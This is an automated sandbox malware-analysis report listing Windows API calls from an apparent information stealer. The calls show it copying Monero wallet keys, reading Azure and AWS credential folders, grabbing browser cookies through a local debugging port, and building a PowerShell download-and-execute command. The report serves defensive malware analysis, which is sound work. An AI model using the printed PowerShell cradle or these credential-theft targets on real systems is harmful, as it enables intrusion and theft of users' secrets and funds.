                            • Part of subcall function 00621120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00621159
                            • Part of subcall function 00621120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00621173
                            • Part of subcall function 00621120: RegCloseKey.ADVAPI32(?), ref: 0062117D
                          • lstrcat.KERNEL32(?,00000000), ref: 006211C0
                          • lstrlen.KERNEL32(?), ref: 006211CD
                          • lstrcat.KERNEL32(?,.keys), ref: 006211E8
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062121F
                          • lstrlen.KERNEL32(01298B40), ref: 0062122D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621251
                          • lstrcat.KERNEL32(00000000,01298B40), ref: 00621259
                          • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00621264
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621288
                          • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00621294
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006212BA
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006212FF
                          • lstrlen.KERNEL32(0129CEA8), ref: 0062130E
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621335
                          • lstrcat.KERNEL32(00000000,?), ref: 0062133D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00621378
                          • lstrcat.KERNEL32(00000000), ref: 00621385
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006213AC
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 006213D5
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621401
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062143D
                            • Part of subcall function 0063EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0063EE12
                          • DeleteFileA.KERNEL32(?), ref: 00621471
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                          • String ID: .keys$\Monero\wallet.keys
                          • API String ID: 2881711868-3586502688
                          • Opcode ID: 039856fd30b42d9fc5bc844ff3e88d7dbce335411f3dbeedeb74053f566ddab4
                          • Instruction ID: dcbe8ad7c965ca6fd3c290cbc5a88aa4ecf055a1152bcaac32fdc5c48b17ce38
                          • Opcode Fuzzy Hash: 039856fd30b42d9fc5bc844ff3e88d7dbce335411f3dbeedeb74053f566ddab4
                          • Instruction Fuzzy Hash: 5AA1A271A01A26ABCB61EB75EC4AADE77BBBF55301F040128F805E7241DB34DE418F94
                          APIs
                          • memset.MSVCRT ref: 0063E740
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0063E769
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E79F
                          • lstrcat.KERNEL32(?,00000000), ref: 0063E7AD
                          • lstrcat.KERNEL32(?,\.azure\), ref: 0063E7C6
                          • memset.MSVCRT ref: 0063E805
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0063E82D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E85F
                          • lstrcat.KERNEL32(?,00000000), ref: 0063E86D
                          • lstrcat.KERNEL32(?,\.aws\), ref: 0063E886
                          • memset.MSVCRT ref: 0063E8C5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0063E8F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E920
                          • lstrcat.KERNEL32(?,00000000), ref: 0063E92E
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0063E947
                          • memset.MSVCRT ref: 0063E986
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$memset$FolderPathlstrcpy
                          • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 4067350539-3645552435
                          • Opcode ID: 513819f096f9a955585085362aa07ab0e608c8c42abd5fc6c0af5fda0e1f5d17
                          • Instruction ID: 01684101bd4e1bcef3c9a543770e99d99c18f4c03c15314366f548feebead7a2
                          • Opcode Fuzzy Hash: 513819f096f9a955585085362aa07ab0e608c8c42abd5fc6c0af5fda0e1f5d17
                          • Instruction Fuzzy Hash: 3C71EA71E40629ABDB61EB64DC46FED7376BF48701F010898B7199B1C0DE749E848FA8
                          APIs
                          • lstrcpy.KERNEL32 ref: 0063ABCF
                          • lstrlen.KERNEL32(0129D978), ref: 0063ABE5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AC0D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063AC18
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AC41
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AC84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063AC8E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063ACB7
                          • lstrlen.KERNEL32(00654AD4), ref: 0063ACD1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063ACF3
                          • lstrcat.KERNEL32(00000000,00654AD4), ref: 0063ACFF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AD28
                          • lstrlen.KERNEL32(00654AD4), ref: 0063AD3A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AD5C
                          • lstrcat.KERNEL32(00000000,00654AD4), ref: 0063AD68
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AD91
                          • lstrlen.KERNEL32(0129DAB0), ref: 0063ADA7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063ADCF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063ADDA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AE03
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063AE3F
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063AE49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063AE6F
                          • lstrlen.KERNEL32(00000000), ref: 0063AE85
                          • lstrcpy.KERNEL32(00000000,0129D948), ref: 0063AEB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen
                          • String ID: f
                          • API String ID: 2762123234-1993550816
                          • Opcode ID: dfb44f0a8c66324055a445a9a6175ae08c531c91825d155bc5f1affb09b68a95
                          • Instruction ID: ed80f933ed6c4c4c55478e39b72f07e9e5b72a57edc7de26c6ab1e87108b9beb
                          • Opcode Fuzzy Hash: dfb44f0a8c66324055a445a9a6175ae08c531c91825d155bc5f1affb09b68a95
                          • Instruction Fuzzy Hash: 13B17E70910A27ABCB62EFA4EC49AEEB3B7BF00301F040528E85597A55DB38DD41DBD5
                          APIs
                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,006372A4), ref: 006447E6
                          • GetProcAddress.KERNEL32(00000000,connect), ref: 006447FC
                          • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0064480D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0064481E
                          • GetProcAddress.KERNEL32(00000000,htons), ref: 0064482F
                          • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00644840
                          • GetProcAddress.KERNEL32(00000000,recv), ref: 00644851
                          • GetProcAddress.KERNEL32(00000000,socket), ref: 00644862
                          • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00644873
                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00644884
                          • GetProcAddress.KERNEL32(00000000,send), ref: 00644895
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                          • API String ID: 2238633743-3087812094
                          • Opcode ID: 909d8d3e3f5cf324647fcedc18529f5c668babf4471249fcfdc212dc65407c59
                          • Instruction ID: 2911e75700fb5e8ef2bcb8a2ec817f2c41415f08b8a98c3c824e41ae98c90390
                          • Opcode Fuzzy Hash: 909d8d3e3f5cf324647fcedc18529f5c668babf4471249fcfdc212dc65407c59
                          • Instruction Fuzzy Hash: D1117C71952F10EBC7209FB4AC1EA563EB9BA097477050C1BF992E61A0EBFC4404EF50
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063BE53
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063BE86
                          • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0063BE91
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063BEB1
                          • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0063BEBD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063BEE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063BEEB
                          • lstrlen.KERNEL32(')"), ref: 0063BEF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063BF13
                          • lstrcat.KERNEL32(00000000,')"), ref: 0063BF1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063BF46
                          • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0063BF66
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063BF88
                          • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0063BF94
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063BFBA
                          • ShellExecuteEx.SHELL32(?), ref: 0063C00C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 4016326548-898575020
                          • Opcode ID: 1280a4fd26ecd29431954927c62c1034e2e4aff1a9b84e3e9ec3eca47362be16
                          • Instruction ID: bc00a75fb97d52fb74938ea63644fbf2fcfe4ade418cfd800decf9da0f70e98c
                          • Opcode Fuzzy Hash: 1280a4fd26ecd29431954927c62c1034e2e4aff1a9b84e3e9ec3eca47362be16
                          • Instruction Fuzzy Hash: BD61A471E11626ABCB51AFB59C4A5EE7BABBF04301F042429F549E3341DB38C9458F94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0064184F
                          • lstrlen.KERNEL32(01286188), ref: 00641860
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641887
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00641892
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006418C1
                          • lstrlen.KERNEL32(00654FA0), ref: 006418D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006418F4
                          • lstrcat.KERNEL32(00000000,00654FA0), ref: 00641900
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0064192F
                          • lstrlen.KERNEL32(01286038), ref: 00641945
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0064196C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00641977
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006419A6
                          • lstrlen.KERNEL32(00654FA0), ref: 006419B8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006419D9
                          • lstrcat.KERNEL32(00000000,00654FA0), ref: 006419E5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641A14
                          • lstrlen.KERNEL32(012860B8), ref: 00641A2A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641A51
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00641A5C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641A8B
                          • lstrlen.KERNEL32(012860D8), ref: 00641AA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641AC8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00641AD3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00641B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen
                          • String ID:
                          • API String ID: 1049500425-0
                          • Opcode ID: c44ab61920652edfe426ac26de7bd011eefa31b1a0aa51e5bae535faf2610453
                          • Instruction ID: 3fdcd2b3eb0710079df826c337ff6eda8bc277c378940afeca27db1a7ad17dc4
                          • Opcode Fuzzy Hash: c44ab61920652edfe426ac26de7bd011eefa31b1a0aa51e5bae535faf2610453
                          • Instruction Fuzzy Hash: 9F914FB0A01B07EFD720AFB6DC98A5A77EABF05301B145829E886D7751DB38D881CB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00634793
                          • LocalAlloc.KERNEL32(00000040,?), ref: 006347C5
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00634812
                          • lstrlen.KERNEL32(00654B60), ref: 0063481D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063483A
                          • lstrcat.KERNEL32(00000000,00654B60), ref: 00634846
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063486B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634898
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006348A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006348CA
                          • StrStrA.SHLWAPI(?,00000000), ref: 006348DC
                          • lstrlen.KERNEL32(?), ref: 006348F0
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00634931
                          • lstrcpy.KERNEL32(00000000,?), ref: 006349B8
                          • lstrcpy.KERNEL32(00000000,?), ref: 006349E1
                          • lstrcpy.KERNEL32(00000000,?), ref: 00634A0A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00634A30
                          • lstrcpy.KERNEL32(00000000,?), ref: 00634A5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 4107348322-3310892237
                          • Opcode ID: 221e44cae56e7b7451e9a1aa254d69aacbb0a7d63321ba69aa8d4b1a537cf240
                          • Instruction ID: 8e76a529e218a8b16a26713bf69291e4aee238642072b762e2a6c2b56e52b162
                          • Opcode Fuzzy Hash: 221e44cae56e7b7451e9a1aa254d69aacbb0a7d63321ba69aa8d4b1a537cf240
                          • Instruction Fuzzy Hash: C4B1C171A11A26ABCB61EF75E896ADEB7B7AF40300F040528F846A7715DF34EC058BD4
                          APIs
                            • Part of subcall function 006290C0: InternetOpenA.WININET(0064CFEC,00000001,00000000,00000000,00000000), ref: 006290DF
                            • Part of subcall function 006290C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006290FC
                            • Part of subcall function 006290C0: InternetCloseHandle.WININET(00000000), ref: 00629109
                          • strlen.MSVCRT ref: 006292E1
                          • strlen.MSVCRT ref: 006292FA
                            • Part of subcall function 00628980: std::_Xinvalid_argument.LIBCPMT ref: 00628996
                          • strlen.MSVCRT ref: 00629399
                          • strlen.MSVCRT ref: 006293E6
                          • lstrcat.KERNEL32(?,cookies), ref: 00629547
                          • lstrcat.KERNEL32(?,00651794), ref: 00629559
                          • lstrcat.KERNEL32(?,?), ref: 0062956A
                          • lstrcat.KERNEL32(?,00654B98), ref: 0062957C
                          • lstrcat.KERNEL32(?,?), ref: 0062958D
                          • lstrcat.KERNEL32(?,.txt), ref: 0062959F
                          • lstrlen.KERNEL32(?), ref: 006295B6
                          • lstrlen.KERNEL32(?), ref: 006295DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 00629614
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
